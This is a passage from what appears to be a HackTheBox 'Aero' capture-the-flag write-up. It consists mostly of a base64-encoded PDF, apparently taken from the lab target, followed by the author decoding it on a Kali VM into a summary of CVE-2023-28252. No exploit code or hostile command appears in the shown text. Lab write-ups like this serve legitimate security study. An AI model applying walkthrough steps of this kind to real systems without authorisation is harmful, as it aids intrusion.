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JlYW0KZW5kb2JqCgo5IDAgb2JqCjw8L1R5cGUvRm9udC9TdWJ0eXBlL1RydWVUeXBlL0Jhc2VGb250L0JBQUFBQStMaWJlcmF0aW9uTW9ubwovRmlyc3RDaGFyIDAKL0xhc3RDaGFyIDU2Ci9XaWR0aHNbMCA2MDAgNjAwIDYwMCA2MDAgNjAwIDYwMCA2MDAgNjAwIDYwMCA2MDAgNjAwIDYwMCA2MDAgNjAwIDYwMAo2MDAgNjAwIDYwMCA2MDAgNjAwIDYwMCA2MDAgNjAwIDYwMCA2MDAgNjAwIDYwMCA2MDAgNjAwIDYwMCA2MDAKNjAwIDYwMCA2MDAgNjAwIDYwMCA2MDAgNjAwIDYwMCA2MDAgNjAwIDYwMCA2MDAgNjAwIDYwMCA2MDAgNjAwCjYwMCA2MDAgNjAwIDYwMCA2MDAgNjAwIDYwMCA2MDAgNjAwIF0KL0ZvbnREZXNjcmlwdG9yIDcgMCBSCi9Ub1VuaWNvZGUgOCAwIFIKPj4KZW5kb2JqCgoxMCAwIG9iago8PC9GMSA5IDAgUgo+PgplbmRvYmoKCjExIDAgb2JqCjw8L0ZvbnQgMTAgMCBSCi9Qcm9jU2V0Wy9QREYvVGV4dF0KPj4KZW5kb2JqCgoxIDAgb2JqCjw8L1R5cGUvUGFnZS9QYXJlbnQgNCAwIFIvUmVzb3VyY2VzIDExIDAgUi9NZWRpYUJveFswIDAgNjEyIDc5Ml0vQ29udGVudHMgMiAwIFI+PgplbmRvYmoKCjQgMCBvYmoKPDwvVHlwZS9QYWdlcwovUmVzb3VyY2VzIDExIDAgUgovTWVkaWFCb3hbIDAgMCA2MTIgNzkyIF0KL0tpZHNbIDEgMCBSIF0KL0NvdW50IDE+PgplbmRvYmoKCjEyIDAgb2JqCjw8L1R5cGUvQ2F0YWxvZy9QYWdlcyA0IDAgUgovT3BlbkFjdGlvblsxIDAgUiAvWFlaIG51bGwgbnVsbCAwXQovTGFuZyhlbi1VUykKPj4KZW5kb2JqCgoxMyAwIG9iago8PC9DcmVhdG9yPEZFRkYwMDU3MDA3MjAwNjkwMDc0MDA2NTAwNzI+Ci9Qcm9kdWNlcjxGRUZGMDA0QzAwNjkwMDYyMDA3MjAwNjUwMDRGMDA2NjAwNjYwMDY5MDA2MzAwNjUwMDIwMDAzNzAwMkUwMDM0PgovQ3JlYXRpb25EYXRlKEQ6MjAyMzA5MjExODE4MTQrMDInMDAnKT4+CmVuZG9iagoKeHJlZgowIDE0CjAwMDAwMDAwMDAgNjU1MzUgZiAKMDAwMDAxMzIwNSAwMDAwMCBuIAowMDAwMDAwMDE5IDAwMDAwIG4gCjAwMDAwMDE1NTAgMDAwMDAgbiAKMDAwMDAxMzMwMyAwMDAwMCBuIAowMDAwMDAxNTcxIDAwMDAwIG4gCjAwMDAwMTE5ODcgMDAwMDAgbiAKMDAwMDAxMjAwOSAwMDAwMCBuIAowMDAwMDEyMTk3IDAwMDAwIG4gCjAwMDAwMTI3MzcgMDAwMDAgbiAKMDAwMDAxMzExOCAwMDAwMCBuIAowMDAwMDEzMTUwIDAwMDAwIG4gCjAwMDAwMTM0MDIgMDAwMDAgbiAKMDAwMDAxMzQ5OSAwMDAwMCBuIAp0cmFpbGVyCjw8L1NpemUgMTQvUm9vdCAxMiAwIFIKL0luZm8gMTMgMCBSCi9JRCBbIDw2MjVDNEQ2QjQ3NjREOUI3QzdDQzg0OTg1MTlGQzYxMj4KPDYyNUM0RDZCNDc2NEQ5QjdDN0NDODQ5ODUxOUZDNjEyPiBdCi9Eb2NDaGVja3N1bSAvRjBBQkY4NUJDOEIxQjkxRUYzMkVBNkM5RTUzM0QwMTQKPj4Kc3RhcnR4cmVmCjEzNjc0CiUlRU9GCg==</code></pre></div> <p>From my kali VM, I decoded the base64 output:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Aero] └─$ echo "JVBERi0xLjY&lt;...snip...>iUlRU9GCg==" | base64 -d > CVE-2023-28252_Summary.pdf</code></pre></div> <p><code class="language-text">CVE-2023-28252_Summary.pdf</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/44745b08c47890360faa11177c83a328/43df9/CVE-2023-28252_Summary.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 81.64556962025317%; position: relative; bottom: 0; left: 0; background-image: 